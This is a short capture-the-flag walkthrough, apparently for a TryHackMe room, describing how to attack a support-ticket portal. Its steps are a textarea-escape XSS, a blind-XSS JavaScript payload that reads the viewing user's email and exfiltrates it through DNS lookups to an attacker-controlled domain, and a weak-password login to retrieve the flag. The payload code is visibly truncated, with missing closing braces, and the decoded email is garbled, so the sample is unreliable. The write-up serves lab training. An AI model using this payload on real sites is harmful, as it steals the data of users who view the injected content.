Step 1: Create a user account on the portal

Step 2: Create a ticket and note that by escaping the textarea tag you can perform XSS

Step 3: ( BlindXSS ) Get an external source where you can log requests i.e TryHackMe Request logger on or burp suite and then you’ll notice that if you put an external source into the XSS i.e </textarea><img src=”external src”> you wont get a HTTP call but just a DNS lookup. This is because the machines firewall only allows external connections for DNS

Step 4: You’ll notice that the email address that you’re logged in with is displayed on the top right of the screen. This is what you need to steal from the account that is viewing your support tickets. Using a combination of the BlindXSS and the Request logger you’ll be able to Exfil this information through DNS Request. You can achieve this by using the below code sample.

let str = document.getElementById('email').innerText;
let encoded = '';
    for (let i = 0; i < str.length; i++) {
        if( i == 20 || i == 40 || i == 60 || i == 80 ){
            encoded += '.';
        encoded += String("00" +  str.charCodeAt(i)).slice(-3);
document.write( '<img src="http://' + encoded + '.{{your-unique-domain-on-burp-or-thm}}/">');

5. You’ll now be able to decode the email address and see that it is [email protected]

6. Using this email address you’ll be able to crack the login page which is very simply 123123 and then view the support ticket to get the THM flag.